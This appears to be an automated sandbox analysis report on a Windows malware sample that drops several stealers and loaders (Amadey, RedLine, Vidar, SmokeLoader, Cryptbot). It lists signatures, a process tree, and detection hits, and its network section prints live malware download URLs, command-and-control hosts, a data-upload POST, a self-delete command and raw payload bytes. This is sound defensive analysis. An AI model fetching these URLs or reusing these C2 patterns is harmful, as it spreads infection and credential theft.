Windows Analysis Report QMn13jz6nj.exe

Overview

General Information

Sample Name: QMn13jz6nj.exe
Analysis ID: 531737
MD5: c6e5298f945f91851744f96ee16412e5
SHA1: 960d38c010136a907de89e32835608d92a200829
SHA256: f7b5a27355eafa5302a38a1e0adadcb619b6d42e7c1707a784297634a180a66f
Tags: Amadey, exe

Detection

Amadey Cryptbot RedLine SmokeLoader Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Cryptbot
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to evade analysis by execution special instruction which cause usermode exception
Query firmware table information (likely to detect VMs)
Connects to many ports of the same IP (likely port scanning)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Hides threads from debuggers
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Del in CommandLine
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Checks for debuggers (devices)
Binary contains a suspicious time stamp
PE file contains more sections than normal
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • QMn13jz6nj.exe (PID: 2228 cmdline: "C:\Users\user\Desktop\QMn13jz6nj.exe" MD5: C6E5298F945F91851744F96EE16412E5)
    • QMn13jz6nj.exe (PID: 3416 cmdline: "C:\Users\user\Desktop\QMn13jz6nj.exe" MD5: C6E5298F945F91851744F96EE16412E5)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • A70A.exe (PID: 3340 cmdline: C:\Users\user\AppData\Local\Temp\A70A.exe MD5: 31F17AD58D02772DF14EFAC37D416CD7)
        • C169.exe (PID: 6276 cmdline: C:\Users\user\AppData\Local\Temp\C169.exe MD5: 5115E5DAB211559A85CD0154E8100F53)
          • conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • C169.exe (PID: 2256 cmdline: C:\Users\user\AppData\Local\Temp\C169.exe MD5: 5115E5DAB211559A85CD0154E8100F53)
        • D466.exe (PID: 6636 cmdline: C:\Users\user\AppData\Local\Temp\D466.exe MD5: DF13FAC0D8B182E4D8B9A02BA87A9571)
          • WerFault.exe (PID: 6708 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • AA02.exe (PID: 5976 cmdline: C:\Users\user\AppData\Local\Temp\AA02.exe MD5: 349A409711C0A8F53C5F90A993A621F2)
          • cmd.exe (PID: 4340 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\AA02.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • timeout.exe (PID: 1904 cmdline: timeout /t 5 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
        • B6B5.exe (PID: 6720 cmdline: C:\Users\user\AppData\Local\Temp\B6B5.exe MD5: CBC4BD8906093C0CCC55379319D65DB1)
          • B6B5.exe (PID: 3540 cmdline: C:\Users\user\AppData\Local\Temp\B6B5.exe MD5: CBC4BD8906093C0CCC55379319D65DB1)
        • D375.exe (PID: 6632 cmdline: C:\Users\user\AppData\Local\Temp\D375.exe MD5: CA16CA4AA9CF9777274447C9F4BA222E)
        • EE61.exe (PID: 5680 cmdline: C:\Users\user\AppData\Local\Temp\EE61.exe MD5: 97617914D6E8A6E3CBEE8A5E5FF39AA5)
          • EE61.exe (PID: 5344 cmdline: C:\Users\user\AppData\Local\Temp\EE61.exe MD5: 97617914D6E8A6E3CBEE8A5E5FF39AA5)
  • ddigjgj (PID: 6700 cmdline: C:\Users\user\AppData\Roaming\ddigjgj MD5: C6E5298F945F91851744F96EE16412E5)
    • ddigjgj (PID: 6464 cmdline: C:\Users\user\AppData\Roaming\ddigjgj MD5: C6E5298F945F91851744F96EE16412E5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security |
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
0000000B.00000002.573313266.00000000012E2000.00000040.00020000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0000001C.00000002.503480050.00000000005B1000.00000004.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000017.00000000.476958517.0000000000402000.00000040.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0000001A.00000003.478772499.00000000008C0000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000001A.00000003.478772499.00000000008C0000.00000004.00000001.sdmp | JoeSecurity_Cryptbot | Yara detected Cryptbot | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
23.2.C169.exe.2f893c6.2.unpack | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth | 0x155f6:$x1: https://cdn.discordapp.com/attachments/
23.2.C169.exe.400000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
16.2.C169.exe.3dd5e88.1.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
23.0.C169.exe.400000.10.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
16.2.C169.exe.3dd5e88.1.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

                        Sigma Overview

                        System Summary:

                        Sigma detected: Suspicious Del in CommandLine
                        Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\AA02.exe" & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\AA02.exe" & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\AA02.exe, ParentImage: C:\Users\user\AppData\Local\Temp\AA02.exe, ParentProcessId: 5976, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\AA02.exe" & exit, ProcessId: 4340

                        Jbx Signature Overview

                        AV Detection:

                        Antivirus detection for URL or domain
                        Source: http://host-file-host-3.com/files/8723_1638191106_2017.exe, Avira URL Cloud: Label: malware
                        Source: http://host-file-host-3.com/files/5311_1638303032_7343.exe, Avira URL Cloud: Label: malware
                        Source: http://host-file-host-3.com/files/6096_1638289274_6885.exe, Avira URL Cloud: Label: malware
                        Source: http://privacytoolzforyou-7000.com/downloads/toolspab3.exe, Avira URL Cloud: Label: malware
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\C169.exe, Avira: detection malicious, Label: HEUR/AGEN.1144480
                        Source: C:\Users\user\AppData\Local\Temp\D375.exe, Avira: detection malicious, Label: TR/Crypt.XPACK.Gen2
                        Multi AV Scanner detection for submitted file
                        Source: QMn13jz6nj.exe, Virustotal: Detection: 47%
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exe, Metadefender: Detection: 25%
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exe, ReversingLabs: Detection: 57%
                        Source: C:\Users\user\AppData\Local\Temp\C169.exe, Metadefender: Detection: 37%
                        Source: C:\Users\user\AppData\Local\Temp\C169.exe, ReversingLabs: Detection: 78%
                        Source: C:\Users\user\AppData\Local\Temp\D375.exe, Metadefender: Detection: 42%
                        Source: C:\Users\user\AppData\Local\Temp\D375.exe, ReversingLabs: Detection: 85%
                        Source: C:\Users\user\AppData\Local\Temp\D466.exe, Metadefender: Detection: 28%
                        Source: C:\Users\user\AppData\Local\Temp\D466.exe, ReversingLabs: Detection: 51%
                        Machine Learning detection for sample
                        Source: QMn13jz6nj.exe, Joe Sandbox ML: detected
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\D466.exe, Joe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, Joe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\C169.exe, Joe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exe, Joe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exe, Joe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\ddigjgj, Joe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\D375.exe, Joe Sandbox ML: detected
                        Source: 26.0.D375.exe.8e0000.1.unpack, Avira: Label: TR/Crypt.XPACK.Gen2
                        Source: 26.0.D375.exe.8e0000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen2
                        Source: 22.2.AA02.exe.5b0e50.1.unpack, Avira: Label: TR/Patched.Ren.Gen
                        Source: 26.2.D375.exe.8e0000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen2
                        Source: 22.3.AA02.exe.5e0000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
                        Source: 26.0.D375.exe.8e0000.2.unpack, Avira: Label: TR/Crypt.XPACK.Gen2
                        Source: 26.0.D375.exe.8e0000.3.unpack, Avira: Label: TR/Crypt.XPACK.Gen2
                        Source: 11.3.A70A.exe.3460000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, Code function: 22_2_004070D0 CryptUnprotectData,LocalAlloc,LocalFree,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, Code function: 22_2_00407030 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, Code function: 22_2_00406D50 CryptUnprotectData,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, Code function: 22_2_00407360 lstrlen,CryptStringToBinaryA,lstrcatA,lstrcatA,lstrcatA,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, Code function: 22_2_004047B0 _memset,CryptStringToBinaryA,CryptStringToBinaryA,

                        Compliance:

                        Detected unpacking (overwrites its own PE header)
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, Unpacked PE file: 22.2.AA02.exe.400000.0.unpack
                        Source: QMn13jz6nj.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                        Source: C:\Users\user\AppData\Local\Temp\D466.exe, File opened: C:\Windows\SysWOW64\msvcr100.dll
                        Source: unknown, HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49759 version: TLS 1.2
                        Source: Binary string: profapi.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: msvcrt.pdbk source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: EE61.exe, 0000001F.00000000.557886650.0000000000400000.00000040.00000001.sdmp, EE61.exe, 0000001F.00000000.560895556.0000000000400000.00000040.00000001.sdmp, EE61.exe, 0000001F.00000002.568131871.0000000000400000.00000040.00000001.sdmp
                        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001B.00000003.475546297.000000000488F000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: sechost.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: shcore.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: C:\yacopicugux28_yero\lub.pdb source: D466.exe, 00000013.00000000.431033742.0000000000416000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.444432688.0000000000416000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.563965098.0000000000A40000.00000002.00020000.sdmp
                        Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: shell32.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: C:\yacopicugux28_yero\lub.pdb02`e@ source: D466.exe, 00000013.00000000.431033742.0000000000416000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.444432688.0000000000416000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.563965098.0000000000A40000.00000002.00020000.sdmp
                        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001B.00000003.493989773.0000000004B5D000.00000004.00000040.sdmp
                        Source: Binary string: Windows.Storage.pdbs|=M source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: =C:\xida\wimuhiwepivuz suv.pdb source: AA02.exe, 00000016.00000000.439528441.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: sechost.pdbk source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: combase.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: C:\xida\wimuhiwepivuz suv.pdb source: AA02.exe, 00000016.00000000.439528441.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: efDC:\duluh.pdb02`e@ source: QMn13jz6nj.exe, 00000000.00000002.303636479.0000000000415000.00000002.00020000.sdmp, QMn13jz6nj.exe, 00000000.00000000.297090292.0000000000415000.00000002.00020000.sdmp, ddigjgj, 00000008.00000000.401591547.0000000000415000.00000002.00020000.sdmp, ddigjgj, 00000008.00000002.421779029.0000000000415000.00000002.00020000.sdmp
                        Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: msimg32.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: C:\duluh.pdb source: QMn13jz6nj.exe, 00000000.00000002.303636479.0000000000415000.00000002.00020000.sdmp, QMn13jz6nj.exe, 00000000.00000000.297090292.0000000000415000.00000002.00020000.sdmp, ddigjgj, 00000008.00000000.401591547.0000000000415000.00000002.00020000.sdmp, ddigjgj, 00000008.00000002.421779029.0000000000415000.00000002.00020000.sdmp
                        Source: Binary string: C:\tok\micuh.pdb source: B6B5.exe, 00000019.00000000.448563265.0000000000401000.00000020.00020000.sdmp, B6B5.exe, 00000019.00000002.490272528.0000000000401000.00000020.00020000.sdmp, B6B5.exe, 0000001C.00000000.478287829.0000000000401000.00000020.00020000.sdmp
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, Code function: 22_2_00401240 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, Code function: 22_2_00401050 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, Code function: 22_2_004096C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, Code function: 22_2_00408360 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, Code function: 22_2_00405990 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CopyFileA,DeleteFileA,_strtok_s,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, Code function: 22_2_00409260 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exe, Code function: 22_2_004094F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exe, Code function: 4x nop then call 013E831Fh
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exe, Code function: 4x nop then mov edx, dword ptr [ebp+08h]
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exe, Code function: 4x nop then mov al, byte ptr [ecx]
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exe, Code function: 4x nop then mov edx, dword ptr [ebp+08h]
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exe, Code function: 4x nop then mov ax, word ptr [ecx]

                        Networking:

                        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                        Source: Traffic, Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49875 -> 185.215.113.35:80
                        Source: Traffic, Snort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.3:49876 -> 185.215.113.35:80
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\explorer.exe, Domain query: privacytoolzforyou-7000.com
                        Source: C:\Windows\explorer.exe, Domain query: cdn.discordapp.com
                        Source: C:\Windows\explorer.exe, Domain query: host-file-host-3.com
                        Source: C:\Windows\explorer.exe, Domain query: host-data-coin-11.com
                        Connects to many ports of the same IP (likely port scanning)
                        Source: global traffic, TCP traffic: 45.9.20.149 ports 42871,1,2,4,7,8
                        Source: global traffic, HTTP traffic detected: GET /tratata.php HTTP/1.1 | Host: file-file-host4.com | Connection: Keep-Alive
                        Source: global traffic, HTTP traffic detected: GET /sqlite3.dll HTTP/1.1 | Host: file-file-host4.com | Cache-Control: no-cache | Cookie: PHPSESSID=sc69tg8a29f4pr0nv46ehfqbko
                        Source: global traffic, HTTP traffic detected: POST /tratata.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----PZMY5PHVAI5F3EKF | Host: file-file-host4.com | Content-Length: 81665 | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: PHPSESSID=sc69tg8a29f4pr0nv46ehfqbko
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:28 GMTContent-Type: application/x-msdos-programContent-Length: 1285856Connection: closeLast-Modified: Mon, 29 Nov 2021 13:05:06 GMTETag: "139ee0-5d1ed16faf7da"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 20 3d 15 26 cf ba ee 2f 19 d3 60 ac 4f 9c ef f1 81 8e a1 4f 5b 97 45 f4 e8 76 69 7c ff 44 43 c7 9e 91 5b 41 d1 06 1c 81 dc 16 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b8 78 cc d8 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 10 03 00 00 72 0c 00 00 00 00 00 00 d0 0f 00 00 20 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 17 00 00 04 00 00 5c 1b 14 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 03 00 f4 01 00 00 00 60 03 00 58 6f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 10 00 00 00 50 03 
